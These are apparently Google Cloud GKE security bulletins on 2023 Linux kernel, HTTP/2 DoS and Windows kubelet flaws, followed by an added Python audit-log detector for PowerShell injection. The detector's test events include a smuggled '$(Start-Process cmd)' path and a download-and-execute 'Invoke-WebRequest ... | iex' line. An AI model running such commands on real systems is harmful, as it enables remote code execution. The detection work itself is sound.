Published: 2023-11-08
Updated: 2023-11-21, 2023-12-05, 2023-12-21
Reference:
CVE-2023-4004
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
2023-12-05 Update: Added additional GKE versions for Container-Optimized OS node pools.
2023-11-21 Update: Clarify that only the listed minor versions need to upgrade to a corresponding patch version for GKE.
GKE
Updated: 2023-11-21, 2023-12-05, 2023-12-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
2023-12-21 Update: The original bulletin stated Autopilot clusters are impacted, but this was incorrect. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow
Autopilot clusters are impacted. Clusters using GKE Sandbox are not impacted.
What should I do?
2023-12-05 Update: Some GKE versions were previously missing. The following is an updated list of GKE versions that you can update your Container-Optimized OS to:
2023-11-21 Update: You only need to upgrade to one of the patch versions that are listed in this bulletin if you use that minor version in your nodes. Minor versions that aren't listed aren't impacted. Upgrade your Container-Optimized OS node pools to one of the following versions or later:
Upgrade your Ubuntu node pools to one of the following versions or later:
|
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?
There is no action required. GKE on Bare Metal is not affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-040
Published: 2023-11-06
Updated: 2023-11-21, 2023-12-21
Reference:
CVE-2023-4921
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
2023-11-21 Update: Clarify that only the listed minor versions need to upgrade to a corresponding patch version for GKE.
GKE
Updated: 2023-11-21, 2023-12-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
2023-12-21 Update: The original bulletin stated Autopilot clusters are impacted, but this was incorrect. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow
Autopilot clusters are impacted. Clusters using GKE Sandbox are not impacted.
What should I do?
2023-11-21 Update: You only need to upgrade to one of the patch versions that are listed in this bulletin if you use that minor version in your nodes. Minor versions that aren't listed aren't impacted. Upgrade your Container-Optimized OS node pools to one of the following versions or later:
Upgrade your Ubuntu node pools to one of the following versions or later:
|
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?
There is no action required. GKE on Bare Metal is not affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-039
Published: 2023-11-06
Updated: 2023-11-21, 2023-11-16
Reference:
CVE-2023-4622
2023-11-21 Update: Clarify that only the listed minor versions need to upgrade to a corresponding patch version for GKE.
2023-11-16 Update: The vulnerability associated with this security bulletin is CVE-2023-4622. CVE-2023-4623 was incorrectly listed as the vulnerability in a previous version of the security bulletin.
GKE
Updated: 2023-11-21, 2023-11-16
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
Autopilot clusters are impacted. Clusters using GKE Sandbox are not impacted.
What should I do?
2023-11-21 Update: You only need to upgrade to one of the patch versions that are listed in this bulletin if you use that minor version in your nodes. Minor versions that aren't listed aren't impacted. Upgrade your Container-Optimized OS node pools to one of the following versions or later:
Upgrade your Ubuntu node pools to one of the following versions or later:
|
High |
GKE on VMware
Updated: 2023-11-16
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Updated: 2023-11-16
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Updated: 2023-11-16
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Updated: 2023-11-16
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?
There is no action required. GKE on Bare Metal is not affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-038
Published: 2023-11-06
Updated: 2023-11-21, 2023-12-21
Reference:
CVE-2023-4623
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
2023-11-21 Update: Clarify that only the listed minor versions need to upgrade to a corresponding patch version for GKE.
GKE
Updated: 2023-11-21, 2023-12-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
2023-12-21 Update: The original bulletin stated Autopilot clusters are impacted, but this was incorrect. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow
Autopilot clusters are impacted. Clusters using GKE Sandbox are not impacted.
What should I do?
2023-11-21 Update: You only need to upgrade to one of the patch versions that are listed in this bulletin if you use that minor version in your nodes. Minor versions that aren't listed aren't impacted. Upgrade your Container-Optimized OS node pools to one of the following versions or later:
Upgrade your Ubuntu node pools to one of the following versions or later:
|
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?
There is no action required. GKE on Bare Metal is not affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-037
Published: 2023-11-06
Updated: 2023-11-21, 2023-12-21
Reference:
CVE-2023-4015
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
2023-11-21 Update: Clarify that only the listed minor versions need to upgrade to a corresponding patch version for GKE.
GKE
Updated: 2023-11-21, 2023-12-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
2023-12-21 Update: The original bulletin stated Autopilot clusters are impacted, but this was incorrect. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow
Autopilot clusters are impacted. Clusters using GKE Sandbox are not impacted.
What should I do?
2023-11-21 Update: You only need to upgrade to one of the patch versions that are listed in this bulletin if you use that minor version in your nodes. Minor versions that aren't listed aren't impacted. Upgrade your Container-Optimized OS node pools to one of the following versions or later:
Upgrade your Ubuntu node pools to one of the following versions or later:
|
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?
There is no action required. GKE on Bare Metal is not affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-035
Published: 2023-10-26
Updated: 2023-11-21, 2023-12-21
Reference:
CVE-2023-4206, CVE-2023-4207, CVE-2023-4208, CVE-2023-4128
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
2023-11-21 Update: Clarify that only the listed minor versions need to upgrade to a corresponding patch version for GKE.
GKE
Updated: 2023-11-21, 2023-12-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
2023-12-21 Update: The original bulletin stated Autopilot clusters are impacted, but this was incorrect. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow
Autopilot clusters are impacted. Clusters using GKE Sandbox are not impacted.
What should I do?
2023-11-21 Update: You only need to upgrade to one of the patch versions that are listed in this bulletin if you use that minor version in your nodes. Minor versions that aren't listed aren't impacted. Upgrade your Container-Optimized OS node pools to one of the following versions or later:
Upgrade your Ubuntu node pools to one of the following versions or later:
|
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
High |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
High |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
High |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?
There is no action required. GKE on Bare Metal is not affected as it does not bundle an operating system in its distribution. |
High |
GCP-2023-033
Published: 2023-10-24
Updated: 2023-11-21, 2023-12-21
Reference:
CVE-2023-3777
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted and GKE Sandbox workloads are not impacted.
2023-11-21 Update: Clarify that only the listed minor versions need to upgrade to a corresponding patch version for GKE.
GKE
Updated: 2023-11-21, 2023-12-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
2023-12-21 Update: The original bulletin stated Autopilot clusters are impacted, but this was incorrect. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow
Autopilot clusters are impacted. Clusters that use GKE Sandbox are impacted.
What should I do?
2023-11-21 Update: You only need to upgrade to one of the patch versions that are listed in this bulletin if you use that minor version in your nodes. Minor versions that aren't listed aren't impacted. Upgrade your Container-Optimized OS node pools to one of the following versions or later:
Upgrade your Ubuntu node pools to one of the following versions or later:
|
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?
There is no action required. GKE on Bare Metal is not affected as it does not bundle an operating system in its distribution. |
GCP-2023-030
Published: 2023-10-10
Updated: 2024-03-20
Reference: CVE-2023-44487, CVE-2023-39325
2024-03-20 Update: Added patch versions for GKE on AWS and GKE on Azure.
2024-02-14 Update: Added patch versions for GKE on VMware.
2023-11-09 Update: Added CVE-2023-39325. Updated GKE versions with the latest patches for CVE-2023-44487 and CVE-2023-39325.
GKE
Updated: 2023-11-09
Description | Severity |
---|---|
A Denial-of-Service (DoS) vulnerability was recently discovered in multiple implementations of the HTTP/2 protocol (CVE-2023-44487), including the golang HTTP server used by Kubernetes. The vulnerability could lead to a DoS of the Google Kubernetes Engine (GKE) control plane. GKE clusters with authorized networks configured are protected by limiting network access, but all other clusters are affected.
What should I do?
2023-11-09 Update: We have released new versions of GKE that include the Go and Kubernetes security patches, which you can update your clusters to now. In the coming weeks we will release additional changes to the GKE control plane to further mitigate this issue. The following GKE versions have been updated with patches for CVE-2023-44487 and CVE-2023-39325:
We recommend that you apply the following mitigation as soon as possible and upgrade to the latest patched version when available. Golang patches will be released on October 10. Once available, we will build and qualify a new Kubernetes API server with those patches and make a GKE patched release. Once the GKE release is available, we will update this bulletin with guidance on which version to upgrade your control plane to, and also make the patches visible within GKE security posture when available for your cluster. To receive a Pub/Sub notification when a patch is available for your channel, enable cluster notifications. A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your specific release channel.
Mitigate by configuring authorized networks for control plane access: You can add authorized networks for existing clusters. To learn more, see authorized network for existing clusters. In addition to the authorized networks you add, there are preset IP addresses that can access the GKE control plane. To learn more about these addresses, see Access to control plane endpoints. The following items summarize the cluster isolation:
What vulnerabilities are addressed by this patch?
The vulnerability, CVE-2023-44487, allows an attacker to execute a denial-of-service attack on GKE control plane nodes. |
High |
GKE on VMware
Updated: 2024-02-14
Description | Severity |
---|---|
A Denial-of-Service (DoS) vulnerability was recently discovered in multiple implementations of the HTTP/2 protocol (CVE-2023-44487), including the golang HTTP server used by Kubernetes. The vulnerability could lead to a DoS of the Kubernetes control plane. GKE on VMware creates Kubernetes clusters that are not directly accessible to the Internet by default and are protected from this vulnerability.
What should I do?
2024-02-14 Update: The following versions of GKE on VMware are updated with code to fix this vulnerability. Upgrade your clusters to the following patch versions or later:
If you have configured your GKE on VMware Kubernetes clusters to have direct access to the Internet or other untrusted networks, we recommend working with your firewall administrator to block or limit that access. We recommend that you upgrade to the latest patch version, when available, as soon as possible. Golang patches will be released on October 10. Once available, we will build and qualify a new Kubernetes API server with those patches and make a GKE patched release. Once the GKE release is available, we will update this bulletin with guidance on which version to upgrade your control plane to.
What vulnerabilities are addressed by this patch?
The vulnerability, CVE-2023-44487, allows an attacker to execute a denial-of-service attack on Kubernetes control plane nodes. |
High |
GKE on AWS
Description | Severity |
---|---|
A Denial-of-Service (DoS) vulnerability was recently discovered in multiple implementations of the HTTP/2 protocol (CVE-2023-44487), including the golang HTTP server used by Kubernetes. The vulnerability could lead to a DoS of the Kubernetes control plane. GKE on AWS creates private Kubernetes clusters that are not directly accessible to the Internet by default and are protected from this vulnerability.
What should I do?
2024-03-20 Update: The following GKE on AWS versions have been updated with patches for CVE-2023-44487:
If you have configured your GKE on AWS clusters to have direct access to the Internet or other untrusted networks, we recommend working with your firewall administrator to block or limit that access. We recommend that you upgrade to the latest patch version, when available, as soon as possible. Golang patches will be released on October 10. Once available, we will build and qualify a new Kubernetes API server with those patches and make a GKE patched release. Once the GKE release is available, we will update this bulletin with guidance on which version to upgrade your control plane to.
What vulnerabilities are addressed by this patch?
The vulnerability, CVE-2023-44487, allows an attacker to execute a denial-of-service attack on Kubernetes control plane nodes. |
High |
GKE on Azure
Description | Severity |
---|---|
A Denial-of-Service (DoS) vulnerability was recently discovered in multiple implementations of the HTTP/2 protocol (CVE-2023-44487), including the golang HTTP server used by Kubernetes. The vulnerability could lead to a DoS of the Kubernetes control plane. GKE on Azure creates private Kubernetes clusters that are not directly accessible to the Internet by default and are protected from this vulnerability.
What should I do?
2024-03-20 Update: The following GKE on Azure versions have been updated with patches for CVE-2023-44487:
If you have configured your GKE on Azure clusters to have direct access to the Internet or other untrusted networks, we recommend working with your firewall administrator to block or limit that access. We recommend that you upgrade to the latest patch version, when available, as soon as possible. Golang patches will be released on October 10. Once available, we will build and qualify a new Kubernetes API server with those patches and make a GKE patched release. Once the GKE release is available, we will update this bulletin with guidance on which version to upgrade your control plane to.
What vulnerabilities are addressed by this patch?
The vulnerability, CVE-2023-44487, allows an attacker to execute a denial-of-service attack on Kubernetes control plane nodes. |
High |
GKE on Bare Metal
Description | Severity |
---|---|
A Denial-of-Service (DoS) vulnerability was recently discovered in multiple implementations of the HTTP/2 protocol (CVE-2023-44487), including the golang HTTP server used by Kubernetes. The vulnerability could lead to a DoS of the Kubernetes control plane. Anthos on Bare Metal creates Kubernetes clusters that are not directly accessible to the Internet by default and are protected from this vulnerability.
What should I do?
If you have configured your Anthos on Bare Metal Kubernetes clusters to have direct access to the Internet or other untrusted networks, we recommend working with your firewall administrator to block or limit that access. To learn more, see the GKE on Bare Metal security overview. We recommend that you upgrade to the latest patch version, when available, as soon as possible. Golang patches will be released on October 10. Once available, we will build and qualify a new Kubernetes API server with those patches and make a GKE patched release. Once the GKE release is available, we will update this bulletin with guidance on which version to upgrade your control plane to.
What vulnerabilities are addressed by this patch?
The vulnerability, CVE-2023-44487, allows an attacker to execute a denial-of-service attack on Kubernetes control plane nodes. |
High |
GCP-2023-026
Published: 2023-09-06
Reference: CVE-2023-3676, CVE-2023-3955, CVE-2023-3893
GKE
Description | Severity |
---|---|
Three vulnerabilities (CVE-2023-3676, CVE-2023-3955, CVE-2023-3893) have been discovered in Kubernetes where a user that can create Pods on Windows nodes may be able to escalate to admin privileges on those nodes. These vulnerabilities affect the Windows versions of Kubelet and the Kubernetes CSI proxy. GKE clusters are only affected if they include Windows nodes.
What should I do?
The following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and node pools to one of the following GKE versions:
The GKE control plane will be updated the week of 2023-09-04 to update the csi-proxy to version 1.1.3. If you update your nodes prior to the control plane update, you will need to update your nodes again after the update to take advantage of the new proxy. You can update the nodes again, even without changing the node version, by running the
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your specific release channel.
What vulnerabilities are addressed by this patch?
With CVE-2023-3676, a malicious actor could craft a Pod spec with host path strings that contain PowerShell commands. Kubelet lacks input sanitization and passes this crafted path string to the command executor as an argument where it would execute parts of the string as separate commands. These commands would run with the same administrative privileges as Kubelet has. With CVE-2023-3955, Kubelet grants users who can create Pods the ability to execute code at the same permission level as the Kubelet agent, privileged permissions. With CVE-2023-3893, a similar lack of input sanitization lets a user who can create Pods on Windows nodes running kubernetes-csi-proxy escalate to admin privileges on those nodes. Kubernetes audit logs can be used to detect if this vulnerability is being exploited. Pod create events with embedded PowerShell commands are a strong indication of exploitation. ConfigMaps and Secrets that contain embedded PowerShell commands and are mounted into Pods are also a strong indication of exploitation. |
High |
GKE on VMware
Description | Severity |
---|---|
Three vulnerabilities (CVE-2023-3676, CVE-2023-3955, CVE-2023-3893) have been discovered in Kubernetes where a user that can create Pods on Windows nodes may be able to escalate to admin privileges on those nodes. These vulnerabilities affect the Windows versions of Kubelet and the Kubernetes CSI proxy. Clusters are only affected if they include Windows nodes.
What should I do?
What vulnerabilities are addressed by this patch?
With CVE-2023-3676, a malicious actor could craft a Pod spec with host path strings that contain PowerShell commands. Kubelet lacks input sanitization and passes this crafted path string to the command executor as an argument where it would execute parts of the string as separate commands. These commands would run with the same administrative privileges as Kubelet has. With CVE-2023-3955, Kubelet grants users who can create Pods the ability to execute code at the same permission level as the Kubelet agent, privileged permissions. With CVE-2023-3893, a similar lack of input sanitization lets a user who can create Pods on Windows nodes running kubernetes-csi-proxy escalate to admin privileges on those nodes. Kubernetes audit logs can be used to detect if this vulnerability is being exploited. Pod create events with embedded PowerShell commands are a strong indication of exploitation. ConfigMaps and Secrets that contain embedded PowerShell commands and are mounted into Pods are also a strong indication of exploitation. |
High |
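The audit-log check that the GKE and GKE on VMware entries above describe for CVE-2023-3676 and CVE-2023-3893, written out as an added example (this is not code from the bulletin, from Google, or from the Kubernetes project): a Python script that reads newline-delimited Kubernetes audit events and flags Pod create requests whose hostPath volumes, and ConfigMap create requests whose data values, carry PowerShell command syntax. The sample events are constructed for the example, the token list is a heuristic chosen here rather than a published indicator set, and the script assumes the audit policy recorded request bodies at RequestResponse level, since `requestObject` is absent at Metadata or Request level.

```python
"""Flag Pod/ConfigMap create audit events that embed PowerShell syntax.

Added example, not Google's or the Kubernetes project's tooling. Sample
audit events below are constructed, not captured from a real cluster.
"""
import json
import re

# Tokens that do not belong in a Windows filesystem path but are how
# PowerShell separates, pipes or nests commands. Assumption: this list is a
# starting heuristic chosen for the example, not a vendor-published IOC set.
_PS_TOKENS = re.compile(
    r"\$\(|;|\||&|`|\bInvoke-\w+|\bStart-Process\b|\biex\b", re.IGNORECASE
)


def _host_paths(pod_spec):
    """Every hostPath.path string declared in a Pod spec."""
    for vol in pod_spec.get("volumes", []):
        path = vol.get("hostPath", {}).get("path")
        if path:
            yield path


def _string_leaves(obj):
    """Yield every string value inside a nested dict/list structure."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for value in obj.values():
            yield from _string_leaves(value)
    elif isinstance(obj, list):
        for value in obj:
            yield from _string_leaves(value)


def inspect_event(event):
    """Return a finding dict for one audit event, or None if it looks benign.

    Only 'create' requests for pods and configmaps are examined, and only when
    the request body was recorded (requestObject present).
    """
    if event.get("verb") != "create":
        return None
    body = event.get("requestObject")
    if not body:
        return None
    ref = event.get("objectRef", {})
    resource = ref.get("resource")
    if resource == "pods":
        candidates = list(_host_paths(body.get("spec", {})))
    elif resource == "configmaps":
        candidates = list(_string_leaves(body.get("data", {})))
    else:
        return None
    hits = [s for s in candidates if _PS_TOKENS.search(s)]
    if not hits:
        return None
    return {
        "user": event.get("user", {}).get("username"),
        "resource": resource,
        "namespace": ref.get("namespace"),
        "name": ref.get("name"),
        "matches": hits,
    }


def scan(lines):
    """Scan newline-delimited JSON audit events and return all findings."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        finding = inspect_event(json.loads(line))
        if finding:
            findings.append(finding)
    return findings


# Constructed sample audit events (not real cluster data).
SAMPLE_AUDIT_LOG = [
    json.dumps({
        "kind": "Event", "apiVersion": "audit.k8s.io/v1", "verb": "create",
        "user": {"username": "ci-bot"},
        "objectRef": {"resource": "pods", "namespace": "prod", "name": "web-1"},
        "requestObject": {"spec": {"volumes": [
            {"name": "logs", "hostPath": {"path": "C:\\var\\log\\pods"}}]}},
    }),
    json.dumps({
        "kind": "Event", "apiVersion": "audit.k8s.io/v1", "verb": "create",
        "user": {"username": "dev@example.com"},
        "objectRef": {"resource": "pods", "namespace": "default", "name": "x"},
        "requestObject": {"spec": {"volumes": [
            {"name": "v", "hostPath": {"path": "C:\\var\\log\\$(Start-Process cmd)"}}]}},
    }),
    json.dumps({
        "kind": "Event", "apiVersion": "audit.k8s.io/v1", "verb": "create",
        "user": {"username": "dev@example.com"},
        "objectRef": {"resource": "configmaps", "namespace": "default", "name": "cfg"},
        "requestObject": {"data": {"run": "Invoke-WebRequest http://198.51.100.7/a.ps1 | iex"}},
    }),
    json.dumps({
        "kind": "Event", "apiVersion": "audit.k8s.io/v1", "verb": "get",
        "user": {"username": "dev@example.com"},
        "objectRef": {"resource": "pods", "namespace": "default", "name": "x"},
    }),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_AUDIT_LOG):
        print(finding)
```

Secrets are deliberately not scanned: their data arrives base64-encoded in the request body, so the pattern would never match, and most audit policies omit Secret bodies anyway. Treat a hit as a lead to confirm against the live Pod spec rather than as proof, since `&` or `;` can occasionally appear in a legitimate path.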
GKE on AWS
Description | Severity |
---|---|
Three vulnerabilities (CVE-2023-3676, CVE-2023-3955, CVE-2023-3893) have been discovered in Kubernetes where a user that can create Pods on Windows nodes may be able to escalate to admin privileges on those nodes. These vulnerabilities affect the Windows versions of Kubelet and the Kubernetes CSI proxy. What should I do?GKE on AWS is not affected by these CVEs. No action is required. |
None |
GKE on Azure
Description | Severity |
---|---|
Three vulnerabilities (CVE-2023-3676, CVE-2023-3955, CVE-2023-3893) have been discovered in Kubernetes where a user that can create Pods on Windows nodes may be able to escalate to admin privileges on those nodes. These vulnerabilities affect the Windows versions of Kubelet and the Kubernetes CSI proxy. What should I do?GKE on Azure is not affected by these CVEs. No action is required. |
None |
GKE on Bare Metal
Description | Severity |
---|---|
Three vulnerabilities (CVE-2023-3676, CVE-2023-3955, CVE-2023-3893) have been discovered in Kubernetes where a user that can create Pods on Windows nodes may be able to escalate to admin privileges on those nodes. These vulnerabilities affect the Windows versions of Kubelet and the Kubernetes CSI proxy. What should I do?GKE on Bare Metal is not affected by these CVEs. No action is required. |
None |
GCP-2023-018
Published: 2023-06-27
Reference: CVE-2023-2235
GKE
Description | Severity |
---|---|
A new vulnerability (CVE-2023-2235) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE Autopilot clusters are affected as GKE Autopilot nodes always use Container-Optimized OS node images. GKE Standard clusters with versions 1.25 or later that are running Container-Optimized OS node images are affected. GKE clusters are not affected if they are running only Ubuntu node images, or running versions before 1.25, or using GKE Sandbox. What should I do?The following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and node pools to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your specific release channel. What vulnerabilities are being addressed? With CVE-2023-2235, the perf_group_detach function did not check the attach_state of the event's siblings before calling add_event_to_groups(), but remove_on_exec made it possible to call list_del_event() on sibling events before they were detached from their group, leaving a dangling pointer and a use-after-free vulnerability. |
High |
GKE on VMware
Description | Severity |
---|---|
A new vulnerability (CVE-2023-2235) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE on VMware clusters are affected. What should I do?What vulnerabilities are being addressed? With CVE-2023-2235, the perf_group_detach function did not check the attach_state of the event's siblings before calling add_event_to_groups(), but remove_on_exec made it possible to call list_del_event() on sibling events before they were detached from their group, leaving a dangling pointer and a use-after-free vulnerability. |
High |
GKE on AWS
Description | Severity |
---|---|
A new vulnerability (CVE-2023-2235) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE on AWS clusters are affected. What should I do?What vulnerabilities are addressed by this patch? With CVE-2023-2235, the perf_group_detach function did not check the attach_state of the event's siblings before calling add_event_to_groups(), but remove_on_exec made it possible to call list_del_event() on sibling events before they were detached from their group, leaving a dangling pointer and a use-after-free vulnerability. |
High |
GKE on Azure
Description | Severity |
---|---|
A new vulnerability (CVE-2023-2235) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE on Azure clusters are affected. What should I do?What vulnerabilities are addressed by this patch? With CVE-2023-2235, the perf_group_detach function did not check the attach_state of the event's siblings before calling add_event_to_groups(), but remove_on_exec made it possible to call list_del_event() on sibling events before they were detached from their group, leaving a dangling pointer and a use-after-free vulnerability. |
High |
GKE on Bare Metal
Description | Severity |
---|---|
A new vulnerability (CVE-2023-2235) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. Google Distributed Cloud Virtual for Bare Metal is not affected by this CVE. What should I do?No action is required. |
None |
GCP-2023-017
Published: 2023-06-26
Updated: 2023-07-11
Reference: CVE-2023-31436
2023-07-11 Update: New GKE versions have been updated to include the latest Ubuntu versions that patch CVE-2023-31436.
GKE
Updated: 2023-07-11
Description | Severity |
---|---|
A new vulnerability (CVE-2023-31436) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE clusters, including Autopilot clusters, are affected. GKE clusters using GKE Sandbox are not affected. What should I do?2023-07-11 Update: Ubuntu patch versions are available. The following GKE versions have been updated to include the latest Ubuntu versions that patch CVE-2023-31436:
The following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and node pools to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your specific release channel. What vulnerabilities are being addressed? With CVE-2023-31436, an out-of-bounds memory access flaw was found in the Linux kernel's traffic control (QoS) subsystem: qfq_change_class takes the network device's MTU as the lmax value without validating it against the allowed maximum, so a user can trigger the function with an incorrect MTU. This flaw allows a local user to crash the system or potentially escalate their privileges. |
High |
GKE on VMware
Description | Severity |
---|---|
A new vulnerability (CVE-2023-31436) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE on VMware clusters are affected. What should I do?What vulnerabilities are being addressed? With CVE-2023-31436, an out-of-bounds memory access flaw was found in the Linux kernel's traffic control (QoS) subsystem: qfq_change_class takes the network device's MTU as the lmax value without validating it against the allowed maximum, so a user can trigger the function with an incorrect MTU. This flaw allows a local user to crash the system or potentially escalate their privileges. |
High |
GKE on AWS
Description | Severity |
---|---|
